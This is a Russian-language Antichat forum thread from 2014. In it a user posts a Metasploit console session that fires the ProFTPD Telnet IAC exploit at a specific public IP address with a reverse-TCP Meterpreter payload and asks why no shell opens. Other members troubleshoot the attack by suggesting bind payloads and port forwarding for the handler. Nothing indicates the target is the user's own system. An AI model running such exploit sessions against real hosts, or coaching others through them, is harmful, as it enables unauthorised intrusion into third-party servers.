ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.03.2014, 01:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 5283
Репутация:
0
|
|
Что не так?
Код:
Code:
msf > use linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 213.239.235.179
RHOST => 213.239.235.179
msf exploit(proftp_telnet_iac) > set RPORT 21
RPORT => 21
msf exploit(proftp_telnet_iac) > set TARGET 0
TARGET => 0
msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(proftp_telnet_iac) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(proftp_telnet_iac) > exploit[*] Started reverse handler on 192.168.1.4:4444[*] Automatically detecting the target... [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179][*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
msf exploit(proftp_telnet_iac) >
И всё((
|
|
|
|

14.03.2014, 02:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.
По вероятности:
1) Целевая версия таки не уязвима
2) Цель уязвима, но не может законнектиться к вам.
|
|
|
|

14.03.2014, 09:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 5283
Репутация:
0
|
|
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.
|
|
|
|

14.03.2014, 15:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от nike001
nike001 said:
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
|
|
|
|

14.03.2014, 15:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 5283
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
|
|
|
|

14.03.2014, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от nike001
nike001 said:
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
Np. Так вы расскажите, поломалась цель?
|
|
|
|

14.03.2014, 16:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 5283
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
Np. Так вы расскажите, поломалась цель?
Сейчас буду пробовать. Позже отпишусь.
|
|
|
|

14.03.2014, 16:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 5283
Репутация:
0
|
|
И shell_bind_tcp, и bind_tcp тоже не работают.
P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)
|
|
|
|

15.03.2014, 14:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 49472
Репутация:
0
|
|
А хэндлер-то запущен? и должен быть проброс в локалку...
|
|
|
|

15.03.2014, 14:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 193811
Репутация:
724
|
|
За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|